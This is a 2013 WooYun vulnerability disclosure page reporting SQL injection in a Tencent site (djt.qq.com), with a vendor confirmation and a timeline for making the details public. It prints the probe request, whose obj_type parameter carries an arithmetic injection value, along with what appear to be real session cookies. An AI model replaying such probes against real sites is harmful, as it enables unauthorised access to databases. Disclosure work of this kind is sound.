当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017806

漏洞标题:腾讯某网站SQL注入

相关厂商:腾讯

漏洞作者: 梦琳

提交时间:2013-01-24 17:01

修复时间:2013-03-10 17:02

公开时间:2013-03-10 17:02

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-24: 细节已通知厂商并且等待厂商处理中
2013-01-24: 厂商已经确认,细节仅向厂商公开
2013-02-03: 细节向核心白帽子及相关领域专家公开
2013-02-13: 细节向普通白帽子公开
2013-02-23: 细节向实习白帽子公开
2013-03-10: 细节向公众公开

简要描述:

网站注入!呵呵

详细说明:

GET /portal/comment/index?obj_type=0%2B0%2B0%2B0&obj_id=61&parent_id=0&limit=10&order=DESC&page=1 HTTP/1.1
Cookie: __utmv=; ts_last=/portal/page/178; pgv_pvi=1889256448; pgv_si=s2216821760; pgv_pvid=1099095260; pgv_info=ssid=s975434610; PHPSESSID=o1b76ros4dnio63et0ehhir4i7; __utma=136810853.1847969185.1359015408.1359015784.1359015811.12; __utmb=136810853.1.10.1359015811; __utmc=136810853; __utmz=136810853.1359015408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ts_uid=3882979338; ts_sid=4400471728; __hash__=122a9404e6e98ad1264c878b39213c3b
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://djt.qq.com/portal/event/61
Accept: application/json, text/javascript, */*; q=0.01
Host: djt.qq.com
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

漏洞证明:

123.png


qq2.png

修复方案:

小菜鸟!呵呵!你们看着办!

版权声明:转载请注明来源 梦琳@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-01-24 18:36

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无